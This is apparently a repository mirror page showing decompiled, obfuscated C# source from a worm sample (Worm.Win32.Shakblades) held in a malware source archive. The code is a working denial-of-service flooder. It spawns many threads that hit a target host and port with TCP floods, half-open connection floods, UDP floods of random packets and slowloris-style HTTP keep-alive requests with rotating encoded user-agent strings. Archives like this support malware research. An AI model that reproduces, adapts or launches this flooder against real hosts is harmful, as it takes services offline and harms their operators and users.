ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Ј໺঳ᝮᢶᯀ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

298 lines
13 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.Ј໺঳ᝮᢶᯀ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Net.Sockets;
using System.Text;
using System.Threading;
namespace Ҧ߲ʽ
{
internal class Ј\u0EFA\u09B3ᝮᢶᯀ
{
private static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C Ç\u09F5ࠍ\u0082;
private static bool \u1AA0;
private static string ɀ\u0F30;
private static int \u0EEBΝᝧԠ;
private static int \u1087;
private static int ɱ\u1A8Aᙦ;
private static int \u0027;
private static \u07F6\u181Fᒸৃ ;
private static string[] \u0942 = new string[28]
{
"[W5aioKOUp5yVn5huU4CGfHgznRO9U2lhY25Tipyhl6KqplOBh1w=]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==]",
"[OV6Ac3p9dmF5gH92MWRUYT5GRkFBQGZkQEI/QToxX3aFV4OAf4VARD9BMV5eYUBDP0ExOXSAfhE/sm2BcoV6c312TDFYgIB4fXZzgIVAQz9CTDF5hYWBS0BAiIiIP3iAgHh9dj90gH5Ac4CFP3mFfn06]",
"[bHZ/bjE5aBE/sm16f19lTDFmOg==]",
"[OXSAfoFyhXpzfXZMMV5kWlYxSD9BTBE/sm0xaHp/dYCIhDFfZTFGP0JMMXN4d4U6MQ==]",
"[OXSAfoFyhXpzfXZMMV4RP7JtZFpWMUc/QUwxaHp/REM6]",
"[OWlCQkwxZkwxXXp/hokxQz9FP0M+QzF6RklHTDF2fz5mZEwRP7JtMX5CSToxWHZ0fIBAQ0FBQkFCREIxX3aFhHRygXZHQEc/QUI=]",
"[OWlCQkwxZkwxXXp/hokxekdJR0wxdn8+ZmQRP7JtTDGDh0tBP0o/RDoxWHZ0fIBAQ0FBQkFJQUI=]",
"[OWSGf2BkMUY/STGEhn9FhkwRP7JtMWY6MWCBdoNyMUY/QTFsdn9u]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo0]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo1]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo2]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo3]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo4]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo5]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo6]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo7]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo8]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo9]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==0]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==1]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==2]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==3]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==4]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==5]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==6]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==7]"
};
private static string[] \u0669ѹᏲբ݅ = new string[10]
{
"[udvm1djYbAzPpc2bn5qcjA==]",
"[udvm1djYbAzPpc2bn5qdjA==]",
"[udvm1djYbAzPpc2bn5qijA==]",
"[JUdSQURE2DvBDTkHDAYI+A==]",
"[JUdSQURE2DvBDTkHDAYIEPg=]",
"[JUdSQURE2DvBDTkHDQYI+A==]",
"[J0g9SjnYO8ENBxEGCwv4]",
"[J0g9SjnYO8ENBxEGCPg=]",
"[J0g9SjnYO8ENBxAGEQj4]",
"[J0g9SjnYO8ENBxEGEAj4]"
};
public static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C \u083A\u0606ᓙ\u0F03 => Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082;
public static string \u0E4BᡐḼ
{
get
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Eb314QAADQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("[SYN]", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Er314QABDQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("ECksNL314QApLC8mMA==", true);
default:
return (string) null;
}
}
}
public static bool ͕IJ\u0ADFধ => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0;
public static void ޚ\u1A8E\u1361\u0B12\u007F\u05EB(
Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C _param0,
string _param1,
int _param2,
int _param3,
int _param4,
int _param5,
\u07F6\u181Fᒸৃ _param6)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082 = _param0;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30 = _param1;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ = _param2;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = _param3;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 = _param4;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ = _param5;
Ј\u0EFA\u09B3ᝮᢶᯀ. = _param6;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
}
public static void ŝʊ()
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = true;
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.șȓ)).Start();
}
public static void ϊ() => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
private static void șȓ()
{
for (int index = 0; index < Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087; ++index)
{
try
{
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.\u16FA))
{
IsBackground = true
}.Start();
}
catch (OutOfMemoryException ex)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = index - 1;
break;
}
}
}
private static void \u16FA()
{
int num = 0;
while (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket1.Blocking = false;
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
try
{
socket1.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket1.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ());
socket1.Close();
socket1 = (Socket) null;
}
catch
{
socket1.Close();
break;
}
++num;
Thread.Sleep(1);
}
else
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket2.Blocking = false;
try
{
socket2.BeginConnect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ, new AsyncCallback(Ј\u0EFA\u09B3ᝮᢶᯀ.\u1759ໞ\u060Fᣊ\u1B5B), (object) null);
}
catch
{
}
Thread.Sleep(100);
try
{
if (socket2.Connected)
socket2.Disconnect(false);
socket2.Close();
}
catch
{
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
socket3.Blocking = false;
Socket socket4;
try
{
socket3.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket3.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0738Зܫ\u0837ᚖųᮝ());
++num;
Thread.Sleep(1);
}
socket3.Close();
socket4 = (Socket) null;
}
catch
{
socket3.Close();
socket4 = (Socket) null;
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
Socket socket5 = (Socket) null;
try
{
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket5.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
while (socket5.Connected)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
Thread.Sleep(2000);
}
else
break;
}
else
break;
}
}
catch
{
socket5.Close();
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
}
num = 0;
}
if (!Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
return;
Ј\u0EFA\u09B3ᝮᢶᯀ.ϊ();
}
private static void \u1759ໞ\u060Fᣊ\u1B5B(IAsyncResult _param0)
{
}
private static byte[] \u0738Зܫ\u0837ᚖųᮝ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, 65507)];
random.NextBytes(buffer);
return buffer;
}
private static byte[] \u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
random.NextBytes(buffer);
return buffer;
}
private static byte[] \u0826Ꮽ\u0B72\u1AC1ଲ()
{
Random random = new Random();
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendLine("GET / HTTP/1.1");
stringBuilder.AppendLine("Host: " + Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30);
stringBuilder.AppendLine("User-Agent: " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅.Length - 1)], true) + " " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942.Length - 1)], true));
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
stringBuilder.Append("Connection: keep-alive");
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
}
public enum ք\u0609ǟ\u175C
{
\u0307جᢦ౯᥏\u0DB2,
\u0E86ᐪᬞ\u0F0Dਞ,
\u0C8D\u0AC6ᩬ\u1A5Fᔅ,
ľ\u1C99\u1B67șՔᘱ݆ߜ,
}
}
}
Reference in New Issue View Git Blame Copy Permalink